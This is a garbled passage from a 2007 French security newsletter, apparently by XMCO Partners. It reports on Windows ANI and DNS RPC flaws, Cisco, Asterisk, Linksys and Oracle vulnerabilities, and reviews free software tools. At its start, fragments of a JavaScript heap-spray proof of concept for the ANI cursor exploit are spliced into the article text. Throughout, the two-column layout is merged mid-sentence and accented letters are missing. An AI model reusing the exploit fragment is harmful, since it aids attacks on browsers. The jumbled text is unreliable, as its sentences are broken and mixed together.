VoIP. Une preuve de concept a immdiatement t
document.write("<link rel=\"shortcut publie sur les sites spcialiss.
icon\" href=\"riff.ico\">")

Lien vers licne qui exploite la


vulnrabilit
wait(500)
window.location.reload()

function getSpraySlide(spraySlide,
spraySlideSize)
{
while(spraySlide.length*2<spraySlideSi
ze)
{
spraySlide += spraySlide;
}
spraySlide =
spraySlide.substring(0,spraySlideSize/
2); Peu de temps aprs, plusieurs vulnrabilits ont t
return spraySlide; corriges au sein de WCS (Cisco Wireless Control
}
</SCRIPT> System). Un mot de passe par dfaut permettait d'ac-
cder en lecture/criture certains fichiers.

Enfin, un autre compte par dfaut (ntcuser) tait ajou-


Faille de scurit qui affecte les serveurs
t au systme utilisant CNS (Cisco Network Services).
DNS RPC [2] En connaissant ce compte (mot de passe gal au
WWW.XMCOPARTNERS.COM

nom du compte), le pirate avait accs au systme


Quelques jours plus tard, ce ft au tour des serveurs ainsi qu la configuration du logiciel.
DNS Windows, utilisant l'interface RPC, de devenir le
vecteur prfr de diffusion de plusieurs virus. En ef- Asterisk galement vulnrable des atta-
fet, une faille de scurit, toujours non corrige ques de dnis de service.
(KB935964), rsulte d'un problme li l'interface
RPC. La gravit de la faille est intrinsquement lie au Asterisk, le logiciel VoIP Opensource, fut galement
service RPC rarement disponible sur un serveur DNS touch par plusieurs vulnrabilits relativement impor-
accessible depuis Internet. tantes. Certaines requtes SIP rendaient lapplication
Lenvoi de requtes RPC judicieusement conues inaccessible. Or ceci peut influencer considrable-
permet aux pirates de causer un dbordement de ment le fonctionnement de larchitecture VoIP du r-
tampon et de prendre ainsi le contrle du serveur seau cibl.
DNS vulnrable.

XMCO Partners - 2007 [12]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007 Les routeurs Linksys perdent la tte

Enfin, pour conclure cette partie ddie aux quipements


rseaux, le routeur Linksys WAG200G, utilis par les parti-
culiers, renvoyait des informations critiques suite la rcep-
INFO...
tion de quelques paquets UDP
sur le port 916. Le pirate posi- Les techniques dattaques voluent...
tionn sur le rseau local pouvait
alors rcuprer les donnes sui-
vantes : Les pirates inventent sans cesse de
Mot de passe de linterface nouveaux procds pour piger leurs
web victimes. Le Phishing (mthode qui
Nom dutilisateur PPPoA consiste envoyer un e-mail en masse
Mot de passe PPPoA dans le but dinciter un internaute
SSID visiter un site contrefait) sest ra-
Passphrase WPA pidement dvelopp, et ft longtemps
Modle du produit le procd favoris des malfrats.

Informations plus quutiles pour


un simple utilisateur du rseau... Aujourdhui, de
nouveaux modes ap-
paraissent. Comme
Bases de donnes et PHP ce ft le cas pour
Publication du correctif trimestriel dOra- les clefs USB vro-
les laisses dli-
cle [3] brment dans le
parking dune ban-
Comme son habitude, Oracle a corrig de nombreuses que. Vous lavez compris ce cadeau
vulnrabilits lors de la publication de son correctif trimes- empoisonn contenait un virus, charg
triel. 36 failles de scurit, qui affectent principalement Ora- de rcuprer les donnes personnelles
cle 10g, ont t rendues publiques quelques semaines (mots de passe) et de les envoyer un
aprs leur dcouverte. Les dtails techniques ntaient pas serveur tiers.
exhaustifs et concernaient, principalement, des injections de
commandes SQL, des dnis de service et la possibilit de Plus rcemment en-
mener des attaques de Cross Site Scripting. core, des pirates
ont achet des pu-
blicits Google qui
Month Of PHP Bugs apparaissaient lors
de laffichage des
Aprs le mois des failles Mac OS X et celui des vulnrabili- rsultats dune
ts des navigateurs Internet, un autre projet, ddi cette recherche. Les si-
fois-ci aux problmes identifis au sein de l'interprteur tes points par ces
PHP, a permis deux pirates de publier plus de 30 failles de liens sponsoriss
scurit. La plupart dentre elles concernait des problmes exploitaient une
locaux qui ncessitaient aux pirates dobtenir un accs au rcente vulnrabi-
serveur pour dposer une page PHP spcialement conue lit dInternet
cet effet. Plusieurs exploits taient proposs pour appuyer Explorer...
les dires des auteurs.
Faut-il devenir paranoaque? Attention
ce document est peut tre pig!!!
WWW.XMCOPARTNERS.COM

Rfrences :

[1] Vulnrabilit ANI (MS07-017)


http://www.microsoft.com/france/technet/security/bulletin/ms
07-017.mspx
[2] Vulnrabilit DNS (KB935964)
http://www.microsoft.com/technet/security/advisory/935964.
mspx
[3] Correctif Oracle Avril 2007
http://www.oracle.com/technology/deploy/security/critical-pat
ch-updates/cpuapr2007.html
Liste des serveurs vulnrables

XMCO Partners - 2007 [13]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
Liste des outils bien utiles :
LACTU SCU Avril 2007

OUTILS LIBRES
Chaque mois, nous vous pr-
sentons les outils libres
qui nous paraissent utiles
et pratiques.
Les logiciels abords sont
varis : utilitaires de
dveloppement, scurit et
autres programmes utiles,
voir indispensables, au
sein dune entreprise.

Ce mois-ci, nous avons


choisi de prsenter les
logiciels suivants :
UltraBackup: loutil de
de sauvegarde/restaura-
tion
Google Reader : le ges-
tionnaire de flux RSS de
Google
Google Agenda : le calen-
drier en ligne
Emacs : lditeur de
texte

Vous trouverez la fin de


cette section un tableau
rcapitulatif des versions
de tous les logiciels pr-
sents lors des prcdents
numros de lActu-Scuri-
t.

WWW.XMCOPARTNERS.COM

XMCO Partners - 2007 [14]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007

UltraBackup
Sauvegarde/Restauration
Version actuelle 4/2007
Utilit

Type Outils Systme


Description Ultra Backup est un logiciel de sauvegarde et de restauration com-
plet. Un grand nombre d'options est propos ce qui permet aux d-
butants comme aux experts de raliser sans problme tous les types
de sauvegarde (incrmentale, diffrencielle...). La restauration est
tout aussi efficace et rapide.
Capture dcran

Tlchargement Ultra Backup est disponible sur Windows (toutes versions)


ladresse suivante :

Ultra 2007:
ftp://anonymous.ftp.ovh.net/astase/windows/ub2007setup.exe
Scurit de loutil Aucune faille de scurit n a t identifie
WWW.XMCOPARTNERS.COM

Avis XMCO Les outils de sauvegarde performants et libres ne sont pas l-


gions. De plus, les interfaces sont souvent confuses. Ultra
backup fait partie des logiciels les plus efficaces . Dot d'une in-
terface particulirement soigne, ses performances n'ont rien
envier aux concurrents. Les options de recherches et de restau-
ration ainsi que les rapports gnrs en fin de sauvegarde sdui-
ront les administrateurs les plus pointilleux.

XMCO Partners - 2007 [15]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007

Google Reader
Aggrgateur de flux RSS
Version actuelle

Utilit

Type Utilitaire
Description Depuis quelques annes, Google a pris l'habitude de dvelopper ses
propres logiciels. Ces derniers sont toujours plus innovants. Google
Reader ne droge pas la rgle. Cet outil permet de grer, de clas-
ser et de lire facilement ses flux d'informations sans avoir installer
le moindre fichier sur son ordinateur. Seul un compte Google permet
d'accder ce service en ligne. Toutes les fonctions attendues sont
prsentes (slection des news intressantes dans un dossier ddi,
partage d'informations, ractivit) sans aucune saturation.

Capture dcran

Tlchargement Google Reader est disponible ladresse suivante. Seule la cration


dun compte Google est ncessaire: WWW.XMCOPARTNERS.COM
http://www.googlefr/reader

Scurit de loutil Aucune faille de scurit n a t identifie

Avis XMCO Notre service de veille utilise tous les jours cette application. Elle
nous permet de grer plus dune centaine de flux sans aucun ralen-
tissement. Google Reader se distingue de ses concurrent en propo-
sant des services en ligne accessibles et ce, depuis n'importe quel
ordinateur connect Internet. En deux mots : le meilleur !!!

XMCO Partners - 2007 [16]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007

Google Agenda
Calendrier en ligne
Version actuelle 3.0
Utilit

Type Utilitaire
Description Google Agenda est une autre trouvaille. Google propose un calen-
drier en ligne qui permet de grer son emploi du temps facilement et
de le partager avec dautres collaborateurs ou dautres amis. Linter-
face est simple et le service accessible depuis nimporte quel poste
connect sur Internet et ce, toujours avec un compte Google. Vous
pouvez galement synchroniser votre agenda avec un logiciel local.

Capture dcran

Tlchargement Google Agenda est disponible ladresse suivante. Seul la cration


dun compte Google est ncessaire :

http://www.google.com/calendar/
WWW.XMCOPARTNERS.COM

Scurit de loutil Aucune faille na t publie ce jour.

Avis XMCO Google a une nouvelle fois invent un principe de partage en ligne
simple et pratique. Google Agenda regroupe toutes les fonctionnali-
ts utiles : partage, systme dalerte par e-mail ou par SMS des
vnements ne pas rater, importation dagendas externes, vision
journalire, hebdomadaire et mensuelleencore une trouvaille qui
sduira les business men.

XMCO Partners - 2007 [17]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007

Emacs
Editeur de texte
Version actuelle

Utilit

Type Bureautique/Dveloppement
Description Emacs est une famille dditeur de texte connu utilis par la plupart
des amateurs de systmes Linux/Unix. Ador et chri par les dve-
loppeurs, cet utilitaire reste rserv aux experts qui raffolent des in-
terfaces en mode console avec des options compliques et souvent
difficiles retenir. Malgr tout, les amateurs de lignes de comman-
des sont formels: aucun diteur de texte nest aussi puissant.

Capture dcran

Tlchargement Ce logiciel est disponible pour Windows, Mac OS X et Linux


ladresse suivante:

http://www.gnu.org/software/emacs/emacs.html
WWW.XMCOPARTNERS.COM

Scurit de loutil Aucune faille na t publie ce jour.

Avis XMCO Emacs reste l'diteur de texte le plus utilis par la communaut
Unix. Contrairement Vi ou VIM qui sont relativement difficiles
pour des dbutants, emacs est assez intuitif bien que la connais-
sance des raccourcis savrent indispensable pour une utilisation
optimale.

XMCO Partners - 2007 [18]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007

Suivi des versions


Version actuelle des outils libres prsents dans les
numros prcdents

NOM DERNIRE VERSION DATE LIEN

Debian Sarge Version stables 3.1 19/04/2006 http://www.debian.org/CD/netinst/


r2

Snort 2.6.1.4 03/04/2006 http://www.snort.org/dl/

MySQL 5.2.3-falcon-alpha http://dev.mysql.com/downloads/mysql/5.2.html

5.1.17-bta 03/2007 http://dev.mysql.com/downloads/mysql/5.1.html

5.0.37 02/2007 http://dev.mysql.com/downloads/mysql/5.0.html

4.1.22 http://dev.mysql.com/downloads/mysql/4.1.html

Apache 2.2.4 11/07/2007 http://httpd.apache.org/download.cgi

2.0.59 http://httpd.apache.org/download.cgi

1.3.37 http://httpd.apache.org/download.cgi

Nmap 4.2 11/2006 http://www.insecure.org/nmap/download.html

Firefox 2.0.0.3 03/2007 http://www.mozilla-europe.org/fr/products/firefox/

Thunderbird 2.0.0.0 04/2007 http://www.mozilla-europe.org/fr/products/thunderbird/

Spamassassin 3.1.8 03/2007 http://spamassassin.apache.org/downloads.cgi?update


=200603111700

Putty 0.59 02/2007 http://www.chiark.greenend.org.uk/~sgtatham/putty/do


wnload.html

ClamAV/ClamAV 0.90.1.1 03/2007 http://www.clamav.net/stable.php#pagestart

Ubuntu 6.10 Edgy Eft 10/2006 http://www.ubuntu-fr.org/telechargement


WWW.XMCOPARTNERS.COM

Postfix 2.4 03/2007 http://www.postfix.org/download.html

Squid Stable 14 2.6 01/07/2006 http://www.squid-cache.org/Versions/v2/2.5/

Filezilla 2.2.32 16/04/2007 http://filezilla.sourceforge.net/

OpenSSH 4.6/4.6p1 7/11/2006 http://www.openssh.com/

Search & Destroy 1.4 http://www.safer-networking.org/fr/download/index.htm


l

ARPWatch ftp://ftp.ee.lbl.gov/arpwatch.tar.gz

XMCO Partners - 2007 [19]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007
NOM DERNIRE VERSION DATE LIEN

GnuPG 1.4.7 02/2007 http://www.gnupg.org/(fr)/download/

BartPE 3.1.10a 6/10/2003 http://severinterrier.free.fr/Boot/PE-Builder/

TrueCrypt 4.3 http://www.truecrypt.org/downloads.php

Back-Track 2.0 04/2007 http://www.remote-exploit.org/backtrack_download.ht


ml

MBSA 2.1.1 02/2007 http://www.microsoft.com/technet/security/tools/mbsa


home.mspx

Ps-Exec 1.82 05/03/2007 http://www.microsoft.com/technet/sysinternals/utilities/


psexec.mspx

Helios v1.1a 6/06/2006 http://helios.miel-labs.com/2006/07/download-helios.ht


ml

Opera 9.20 04/02/2007 http://www.opera.com/download/

Internet Explo- IE 7 http://www.microsoft.com/france/windows/downloads/i


rer e/getitnow.mspx

Outils de sup- 1.26 13/02/2007 http://www.microsoft.com/france/securite/outils/malwar


pression de lo- e.mspx
giciels mal-
veillants

F-Secure Blacklight Beta http://www.f-secure.com/blacklight/try_blacklight.html


Blacklight

Writely Writely beta http://www.writely.com

Nessus 3.0.5 01/2007 http://www.nessus.org/download

Windows Servi- 3.5 http://www.microsoft.com/france/windows/sfu/decouvr


ces for Unix ez/detail.mspx

VNC 4.1.2/4.2.9 http://www.realvnc.com/cgi-bin/download.cgi

Vmware Player 1.0.4 26/04/2006 http://www.vmware.com/download/player/

Sync Toy 1.4 http://www.microsoft.com/downloads/details.aspx?Fam


ilyID=E0FC1154-C975-4814-9649-CCE41AF06EB7&dis
WWW.XMCOPARTNERS.COM
playlang=en

MySQL Front 3.0 http://www.clubic.com/lancer-le-telechargement-9175-0


-mysql-front.html

Winscp 4.0 beta 04/04/2007 http://winscp.net/eng/download.php

Lcc v-2007-02-28 28/02/2007 http://www.q-software-solutions.de/downloaders/get_n


ame

Cain 4.9 04/2007 http://www.oxid.it/cain.html

XMCO Partners - 2007 [20]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007
NOM DERNIRE VERSION DATE LIEN

RSS Bandits 1.5.0.10 04/03/2007 http://www.rssbandit.org/

Netmeeting

OpenOffice 2.2 04/2007 http://www.download.openoffice.org/index.html

Pspad 4.5.2 20/10/2006 http://pspad.com/fr/download.php

Cygwin 1.5.24-2 01/2007 http://www.cygwin.com

Aircrack 0.7 02/2007 http://www.aircrack-ng.org/doku.php#download

PDFCreator 0.9.3 http://www.pdfforge.org/products/pdfcreator/download

7-zip 4.42 14/05/2006 http://www.7-zip.org/fr/download.html

PowerToys 07/2002 http://www.microsoft.com/windowsxp/downloads/powe


rtoys/xppowertoys.mspx

Supercopier 2 beta 1.9 09/01/2007 http://supercopier.sfxteam.org/modules/mydownloads/

Active Python/ 2.4.312/5.8.8.820 http://www.activestate.com/products/activepython/


Perl http://www.activestate.com/Products/ActivePerl/

AVG 7.5 http://www.avgfrance.com/doc/31/fr/crp/0

Extensions http://extensions.geckozone.org/Firefox/
Firefox

FeedReader 3.09 03/2007 http://www.feedreader.com/download

Key Pass Pass- 1.07 16/04/2007 http://keypass.info/download.html


word Safe

VmWare conver- 3.0 03/2007 http://www.vmware.com/download/converter


ter

Testdisk http://cgsecurity.org/wiki/Testdisk

Google Desktop 5.0 http://desktop.google.com/index.html


WWW.XMCOPARTNERS.COM

XMCO Partners - 2007 [21]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.

Vous aimerez peut-être aussi